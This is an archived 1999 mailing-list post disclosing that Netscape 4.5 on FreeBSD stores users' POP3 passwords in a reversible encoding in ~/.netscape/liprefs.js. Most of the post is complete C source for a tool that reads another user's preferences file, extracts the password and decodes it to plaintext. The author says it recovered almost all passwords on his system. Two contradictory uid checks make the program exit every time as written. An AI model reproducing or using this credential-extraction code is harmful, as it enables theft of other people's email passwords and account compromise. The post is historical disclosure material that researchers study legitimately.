Netscape 4.5 vulnerability

From: Alexey Pavlov (paaaat_private)
Date: Thu Apr 08 1999 - 10:12:27 PDT

  • Next message: José Reyes Cedeñ: "Re: ICQ Webserver bug" 

    I found method how to get users passwords from Netscape 4.5 for FreeBSD
 ~user/.netscape/liprefs.js file. This file is used for storing user
last
session preferences .This file also contains encrypted password for
pop3.
Not like a DES , this encryption can be decrypted. As a result of many
experiments i wrote this program. It gives me almost all passwords in my
 system, because all people use Netscape.
Here is src of this decryption programm:
-----------------BEGIN CUT HERE-------------
/*****************************************************
This Program designed for extract and decode Netshcape
email password. This program is realy very go-o-o-od!!
Programming by Lesha (c)1999
*****************************************************/
#include<unistd.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
#include<sys/types.h>
#include<pwd.h>
#include<sys/stat.h>
unsigned char Tbl_1[]={
'A','B','C','D','E','F','G','H','I','J','K',
'L','M','N','O','P','Q','R','S','T','U','V',
'W','X','Y','Z','a','b','c','d','e','f','g',
'h','i','j','k','l','m','n','o','p','q','r',
's','t','u','v','w','x','y','z','0','1','2',
'3','4','5','6','7','8','9','+','/','='
};
unsigned char Tbl_2[96][8]={
{0x76,0xe9,0xcf,0x6a,0xbb,0x9e,0x7a,0x62},
{0x77,0xe8,0xce,0x6b,0xba,0x9f,0x7b,0x63},
{0x74,0xeb,0xcd,0x68,0xb9,0x9c,0x78,0x60},
{0x75,0xea,0xcc,0x69,0xb8,0x9d,0x79,0x61},
{0x72,0xed,0xcb,0x6e,0xbf,0x9a,0x7e,0x66},
{0x73,0xec,0xca,0x6f,0xbe,0x9b,0x7f,0x67},
{0x70,0xef,0xc9,0x6c,0xbd,0x98,0x7c,0x64},
{0x71,0xee,0xc8,0x6d,0xbc,0x99,0x7d,0x65},
{0x7e,0xe1,0xc7,0x62,0xb3,0x96,0x72,0x6a},
{0x7f,0xe0,0xc6,0x63,0xb2,0x97,0x73,0x6b},
{0x7c,0xe3,0xc5,0x60,0xb1,0x94,0x70,0x68},
{0x7d,0xe2,0xc4,0x61,0xb0,0x95,0x71,0x69},
{0x7a,0xe5,0xc3,0x66,0xb7,0x92,0x76,0x6e},
{0x7b,0xe4,0xc2,0x67,0xb6,0x93,0x77,0x6f},
{0x78,0xe7,0xc1,0x64,0xb5,0x90,0x74,0x6c},
{0x79,0xe6,0xc0,0x65,0xb4,0x91,0x75,0x6d},
{0x66,0xf9,0xdf,0x7a,0xab,0x8e,0x6a,0x72},
{0x67,0xf8,0xde,0x7b,0xaa,0x8f,0x6b,0x73},
{0x64,0xfb,0xdd,0x78,0xa9,0x8c,0x68,0x70},
{0x65,0xfa,0xdc,0x79,0xa8,0x8d,0x69,0x71},
{0x62,0xfd,0xdb,0x7e,0xaf,0x8a,0x6e,0x76},
{0x63,0xfc,0xda,0x7f,0xae,0x8b,0x6f,0x77},
{0x60,0xff,0xd9,0x7c,0xad,0x88,0x6c,0x74},
{0x61,0xfe,0xd8,0x7d,0xac,0x89,0x6d,0x75},
{0x6e,0xf1,0xd7,0x72,0xa3,0x86,0x62,0x7a},
{0x6f,0xf0,0xd6,0x73,0xa2,0x87,0x63,0x7b},
{0x6c,0xf3,0xd5,0x70,0xa1,0x84,0x60,0x78},
{0x6d,0xf2,0xd4,0x71,0xa0,0x85,0x61,0x79},
{0x6a,0xf5,0xd3,0x76,0xa7,0x82,0x66,0x7e},
{0x6b,0xf4,0xd2,0x77,0xa6,0x83,0x67,0x7f},
{0x68,0xf7,0xd1,0x74,0xa5,0x80,0x64,0x7c},
{0x69,0xf6,0xd0,0x75,0xa4,0x81,0x65,0x7d},
{0x16,0x89,0xaf,0x0a,0xdb,0xfe,0x1a,0x02},
{0x17,0x88,0xae,0x0b,0xda,0xff,0x1b,0x03},
{0x14,0x8b,0xad,0x08,0xd9,0xfc,0x18,0x00},
{0x15,0x8a,0xac,0x09,0xd8,0xfd,0x19,0x01},
{0x12,0x8d,0xab,0x0e,0xdf,0xfa,0x1e,0x06},
{0x13,0x8c,0xaa,0x0f,0xde,0xfb,0x1f,0x07},
{0x10,0x8f,0xa9,0x0c,0xdd,0xf8,0x1c,0x04},
{0x11,0x8e,0xa8,0x0d,0xdc,0xf9,0x1d,0x05},
{0x1e,0x81,0xa7,0x02,0xd3,0xf6,0x12,0x0a},
{0x1f,0x80,0xa6,0x03,0xd2,0xf7,0x13,0x0b},
{0x1c,0x83,0xa5,0x00,0xd1,0xf4,0x10,0x08},
{0x1d,0x82,0xa4,0x01,0xd0,0xf5,0x11,0x09},
{0x1a,0x85,0xa3,0x06,0xd7,0xf2,0x16,0x0e},
{0x1b,0x84,0xa2,0x07,0xd6,0xf3,0x17,0x0f},
{0x18,0x87,0xa1,0x04,0xd5,0xf0,0x14,0x0c},
{0x19,0x86,0xa0,0x05,0xd4,0xf1,0x15,0x0d},
{0x06,0x99,0xbf,0x1a,0xcb,0xee,0x0a,0x12},
{0x07,0x98,0xbe,0x1b,0xca,0xef,0x0b,0x13},
{0x04,0x9b,0xbd,0x18,0xc9,0xec,0x08,0x10},
{0x05,0x9a,0xbc,0x19,0xc8,0xed,0x09,0x11},
{0x02,0x9d,0xbb,0x1e,0xcf,0xea,0x0e,0x16},
{0x03,0x9c,0xba,0x1f,0xce,0xeb,0x0f,0x17},
{0x00,0x9f,0xb9,0x1c,0xcd,0xe8,0x0c,0x14},
{0x01,0x9e,0xb8,0x1d,0xcc,0xe9,0x0d,0x15},
{0x0e,0x91,0xb7,0x12,0xc3,0xe6,0x02,0x1a},
{0x0f,0x90,0xb6,0x13,0xc2,0xe7,0x03,0x1b},
{0x0c,0x93,0xb5,0x10,0xc1,0xe4,0x00,0x18},
{0x0d,0x92,0xb4,0x11,0xc0,0xe5,0x01,0x19},
{0x0a,0x95,0xb3,0x16,0xc7,0xe2,0x06,0x1e},
{0x0b,0x94,0xb2,0x17,0xc6,0xe3,0x07,0x1f},
{0x08,0x97,0xb1,0x14,0xc5,0xe0,0x04,0x1c},
{0x09,0x96,0xb0,0x15,0xc4,0xe1,0x05,0x1d},
{0x36,0xa9,0x8f,0x2a,0xfb,0xde,0x3a,0x22},
{0x37,0xa8,0x8e,0x2b,0xfa,0xdf,0x3b,0x23},
{0x34,0xab,0x8d,0x28,0xf9,0xdc,0x38,0x20},
{0x35,0xaa,0x8c,0x29,0xf8,0xdd,0x39,0x21},
{0x32,0xad,0x8b,0x2e,0xff,0xda,0x3e,0x26},
{0x33,0xac,0x8a,0x2f,0xfe,0xdb,0x3f,0x27},
{0x30,0xaf,0x89,0x2c,0xfd,0xd8,0x3c,0x24},
{0x31,0xae,0x88,0x2d,0xfc,0xd9,0x3d,0x25},
{0x3e,0xa1,0x87,0x22,0xf3,0xd6,0x32,0x2a},
{0x3f,0xa0,0x86,0x23,0xf2,0xd7,0x33,0x2b},
{0x3c,0xa3,0x85,0x20,0xf1,0xd4,0x30,0x28},
{0x3d,0xa2,0x84,0x21,0xf0,0xd5,0x31,0x29},
{0x3a,0xa5,0x83,0x26,0xf7,0xd2,0x36,0x2e},
{0x3b,0xa4,0x82,0x27,0xf6,0xd3,0x37,0x2f},
{0x38,0xa7,0x81,0x24,0xf5,0xd0,0x34,0x2c},
{0x39,0xa6,0x80,0x25,0xf4,0xd1,0x35,0x2d},
{0x26,0xb9,0x9f,0x3a,0xeb,0xce,0x2a,0x32},
{0x27,0xb8,0x9e,0x3b,0xea,0xcf,0x2b,0x33},
{0x24,0xbb,0x9d,0x38,0xe9,0xcc,0x28,0x30},
{0x25,0xba,0x9c,0x39,0xe8,0xcd,0x29,0x31},
{0x22,0xbd,0x9b,0x3e,0xef,0xca,0x2e,0x36},
{0x23,0xbc,0x9a,0x3f,0xee,0xcb,0x2f,0x37},
{0x20,0xbf,0x99,0x3c,0xed,0xc8,0x2c,0x34},
{0x21,0xbe,0x98,0x3d,0xec,0xc9,0x2d,0x35},
{0x2e,0xb1,0x97,0x32,0xe3,0xc6,0x22,0x3a},
{0x2f,0xb0,0x96,0x33,0xe2,0xc7,0x23,0x3b},
{0x2c,0xb3,0x95,0x30,0xe1,0xc4,0x20,0x38},
{0x2d,0xb2,0x94,0x31,0xe0,0xc5,0x21,0x39},
{0x2a,0xb5,0x93,0x36,0xe7,0xc2,0x26,0x3e},
{0x2b,0xb4,0x92,0x37,0xe6,0xc3,0x27,0x3f},
{0x28,0xb7,0x91,0x34,0xe5,0xc0,0x24,0x3c}
 };
unsigned long int getn1(unsigned char c1){
 register int i;
 if(c1=='='){return 0;}
 for(i=0;i<64;i++){if(Tbl_1[i]==c1){return i;}}
 return -1;
 }
int ub64(unsigned char *in,unsigned char *out){
 int i=0;
 int j=0;
 unsigned long int n;
 if(!in||!out){return 0;}
 while(in[i]){

n=(((getn1(in[i+0])&63)<<18)|((getn1(in[i+1])&63)<<12)|((getn1(in[i+2])&63)<<6)|(getn1(in[i+3])&63));
  out[j+0]=(unsigned char)((n>>16)&255);
  out[j+1]=(unsigned char)((n>>8)&255);
  out[j+2]=(unsigned char)(n&255);
  i+=4;j+=3;
  }
 out[j]='\0';
 return 0;
 }
int decodestring(unsigned char *in,unsigned char *out){
 int i;
 int j;
 int l;
 l=strlen(in);if(l>8){l=8;}
 if(!in||!out){return 0;}
 for(i=0;i<l;i++){
  out[i]='?';
  for(j=0;j<95;j++){
   if(Tbl_2[j][i]==in[i]){out[i]=32+j;}
   }
  }
 out[l]='\0';
 return 0;
 }
char usage[]="Usage: getpasswd {-u user|-f file}\n";
int main(int argc,char*argv[]){
 char filename[256];
 FILE *f;
 unsigned char buff[1024];
 unsigned char *r;
 unsigned char passwdbuff[20]="\0";
 unsigned char *s;
 unsigned char decoded1[20];
 unsigned char decoded2[20];
 struct passwd *pass;
 /***************/
 if(getuid()!=1818){exit(0);}
 if(getuid()!=0){exit(0);}
 if(argc<2){printf("%s",usage);exit(0);}
 if(strcmp(argv[1],"-u")==0){
  if((pass=getpwnam(argv[2]))==NULL){printf("User unknown
%s\n",argv[2]);exit(0);}
  strcpy(filename,pass->pw_dir);
  strcat(filename,"/.netscape/liprefs.js");
  }
 else if(strcmp(argv[1],"-f")==0){
  strcpy(filename,argv[2]);
  }
 else{
  printf("Unknown option %s\n",argv[1]);
  printf("%s",usage);
  exit(0);
  }
 /***************/
 if((f=fopen(filename,"r"))==NULL){printf("Cannot open
%s\n",filename);return 0;}
 while(!feof(f)){
  fgets(buff,1024,f);
  if(strstr(buff,"user_pref")){
   if(r=strstr(buff,"mail.pop_password")){
    while(*r!='\"'){r++;}r++;
    while(*r!='\"'){r++;}r++;
    s=passwdbuff;
    while(*r!='\"'){*s=*r;s++;r++;}
    *s='\0';
    }
   }
  }
 fclose(f);
 if(passwdbuff[0]=='\0'){printf("Password not found!\n");return 0;}
 ub64(passwdbuff,decoded1);
 decodestring(decoded1,decoded2);
 printf("%s\n",decoded2);
 }

-----------------END CUT HERE---------------

Good luck,
Lesha

 paaaat_private
 gandalfat_private

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:41:49 PDT